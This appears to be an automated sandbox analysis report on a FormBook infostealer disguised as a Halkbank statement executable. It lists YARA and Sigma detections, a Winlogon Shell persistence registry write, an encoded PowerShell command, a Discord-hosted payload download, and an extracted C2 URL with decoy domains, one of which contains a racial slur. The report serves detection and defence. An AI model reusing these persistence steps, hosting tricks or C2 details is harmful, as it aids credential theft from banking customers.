17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe,"C:\Users\user\AppData\Local\verify.exe",, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe, ProcessId: 3496, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe" , ParentImage: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe, ParentProcessId: 3496, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==, ProcessId: 4744

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: explorer.exe,"C:\Users\user\AppData\Local\verify.exe",, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe, ProcessId: 3496, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe" , ParentImage: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe, ParentProcessId: 3496, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==, ProcessId: 4744

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132878779987433043.4744.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.healthonline.store/po6r/"], "decoy": ["jnhuichuangxin.com", "mubashir.art", "extol.design", "doyyindh.xyz", "milanoautoexperts.com", "4thefringe.com", "453511.com", "sellathonautocredit.com", "velgian.com", "6672pk.com", "wodeluzhou.com", "sumiyoshiku-hizaita.xyz", "imoveldeprimeira.com", "dgjssp.com", "endokc.com", "side-clicks.com", "cashndashfinancial.com", "vanhemelryck.info", "agamitrading.com", "woofgang.xyz", "atnetworkinc.com", "malleshtekumatla.com", "com-home.xyz", "buildyourmtg.com", "viairazur.xyz", "drproteaches.com", "amaznsavings.com", "karencharlestonrealtor.com", "bootstrategy.com", "mimtgexpert.com", "sebzvault.com", "brtaclub.com", "gicarellc.com", "annehonorato.com", "rafalgar.com", "bergenyouthorchestra.com", "entrevistasesenciales.com", "thekneedoctors.com", "grosseilemireal.estate", "celestialdrone.art", "bouwdrogerhurenvlaanderen.com", "koppakart.com", "irishykater.quest", "blinglj.com", "editorparmindersingh.com", "klnhanced.quest", "divinebehaviorsolutions.com", "amprope.com", "futuracart.com", "ditrhub.com", "eaoeducationprogramme.com", "smartplumbing.services", "revelandlaceevents.com", "bikedh.xyz", "pacificdevelopmentstudio.com", "palisadesskivacation.com", "happy-pets.xyz", "killyourselfnigger.com", "sonicdrillinginstitute.com", "alibabascientific.com", "sh-leming.com", "aseelrealestate.com", "lohmueller.gmbh", "ngoccompany.com"]}

Yara detected FormBook

Source: Yara match	File source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: www.healthonline.store/po6r/

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\verify.exe

Joe Sandbox ML: detected

Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49761 version: TLS 1.2

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.935902947.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000003.930075303.0000000001280000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936013595.00000000016CF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.935902947.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000003.930075303.0000000001280000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000011.00000002.936013595.00000000016CF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256 source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 4x nop then pop edi		17_2_0041567B
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe	Code function: 4x nop then pop esi		17_2_004157D7

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.healthonline.store/po6r/

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: GET /attachments/913584216825028612/936582704412110848/Cszji.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.931476656.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.810240160.0000000004A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.931476656.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, verify.exe.0.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/913584216825028612/936582704412110848/Cszji.jpg
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.931638980.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.935430367.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.933451281.0000000003C48000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220128_081138_756957 (1).exe, 00000000.00000002.932856682.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic

HTTP traffic detected: GET /attachments/913584216825028612/936582704412110848/Cszji.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49761 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Halkbank_Ekstre_20220128_081138_756957 (1).exe, type: SAMPLE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.750000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.750000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
